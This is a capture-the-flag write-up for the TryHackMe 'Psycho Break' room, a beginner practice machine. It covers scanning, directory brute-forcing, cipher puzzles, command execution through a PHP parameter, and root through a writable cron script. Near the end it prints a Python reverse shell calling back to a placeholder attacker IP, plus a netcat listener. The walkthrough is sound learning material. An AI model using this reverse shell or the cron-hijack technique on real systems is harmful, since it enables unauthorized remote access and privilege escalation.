Tryhackme Psycho Break Writeup

Hello guys, This Machine is based on the game “Evil Within” on TryHackme which is a beginner friendly room, Includes some Directory Bruteforcing, Privilege Escalation using cronjob with some cryptographic theme around it.

https://tryhackme.com/room/psychobreak

Let’s Start with an NMAP scan

< nmap -sS -sC -sV $MACHINE_IP >

Looking at the nmap results, only 3 Ports are open

  • 21 FTP (No Anonymous Login)
  • 22 SSH
  • 80 Apache

Starting with port 80, we have

Home page

Looking the Source Code to find something Interesting is still classic

Source page

Looks like we have a directory named < /sadistRoom >

Click here

We got the Key to the Locker Room, If we wait here for some time, the page reloads and ask to enter the key, after entering the key we can go to the Locker Room

Enter the Key
Locker Room

In Locker Room, we have a Piece of Text, most likely to be a ciphered text. Lets Check it on Boxentriq Cipher Analyzer

Atbash Cipher

Lets Decipher it now on CyberChef

Use Recipe Atbash

In Output, we now have the Key to unlock the map, Great.

Enter Previously Found Key
Map Unlocked

We already seen the first two rooms, Let’s check Safe Heaven now

Safe Heaven

As said Previously, Checking Source Code is Classic

Safe Heaven Source

It is telling us to search through it, Lets run Gobuster on this to bruteforce the directories

/keeper is looking good

Looks like we have a directory named < /keeper >. Lets check it out.

Click it
Ohh No!!!

In given time, we have to submit the Location given in this image. Our OSINT Skill will help us here. Download the image and Use Google Reverse image look up. Upload the downloaded image.

Great, we got the location, just submit in time

Submit Fast

Awesome!! We got the Keepers Key.

Remember, we still didn’t look up the 4th Room in map

Enter the Keepers Key
Abandoned Room
Meet Laura

Didn’t Know how to escape Laura, Looking at the source code

Source Page of Laura

First I thought < shell> is some hidden directory, but if we gonna bruteforce it we will not have enough time to escape spiderlady. Its a PHP webpage, may be we can supply a parameter named < shell >. Lets do this

It Worked

We could list the directories. But we still don’t know how to escape her. Then, I thought may be I can cat the < /etc/passwd > file to list Users and Bruteforce the SSH using Hydra. But that lead to a rabbit hole. I thought lets list the Previous Directory using < ls .. >

It worked again

Yes! There is a hidden directory which is also MD5 hashed. Lets Escape the spiderlady now.

We got the txt file and a zip file lets download it both and see

.txt file
wget the zip file
Unzipping to see the contents

We have to save Joseph. There is a Image file which doesn’t open as image, may be they hide some fruitful information in there. lets binwalk it

There is some data
Listing the extracted files

There are two files, one of which is a audio file, listing to it immediately tells that it is a Morse code encoded audio.

We can upload our .wav file and decode the hidden message

There was a image too, may be it is the password to extract the file. Lets extract it using steghide

Thankyou.txt

Awesome, We did save Joseph. Now lets FTP using found credentials

We downloaded all files

There are two files, one binary and one dictionary file. Binary file seems to take a Key from user. Lets bruteforce it using given dictionary file and python

import os
import subprocess
import sys

f = open(“random.dic”, “r”)

keys = f.readlines()

for key in keys:
key = str(key.replace(“\n”, “”))
print (key)
subprocess.run([“./program”, key])

I’m not that good in python right now so, I took some help from internet. Using this Python code, we can get the correct key and do not forget to make the Program binary executable

chmod +x program

Key Found

Ugh.. Another Cipher, I got some help from internet and found that it is actually the Multitap phone cipher, Keypad in old phones.

Deciphered

The Correct Key we found for the Program binary is Username for SSH and Decrypted Multi-tap Cipher is Password. Lets SSH our way in

Got User Flag.txt

Awesome! we got the user flag. Now we have to Escalate our privileges. I tried to find SUID but nothing was strange in that. Also we can’t run sudo on this machine as this user. I saw a strange cronjob running on which we have write permissions.

.the_eye_of_ruvik.py

It was a Python code, we gonna edit it and add a python reverse shell and set up a netcat listener

import socket
import subprocess
import os
import pty

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“YOUR_MACHINE_IP”,4242))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn(“/bin/bash”)

cat the file to see everything is set

Set up a netcat listener

nc -nvlp 4242

Done, we just have to wait now for getting a callback.

You got this, You got this, You got this

Finally we are root now. This machine was really fun. We got to learn so much. Now we can finally submit the root flag.

B.Tech Undergraduate, Cybersecurity Enthusiast, CTF Player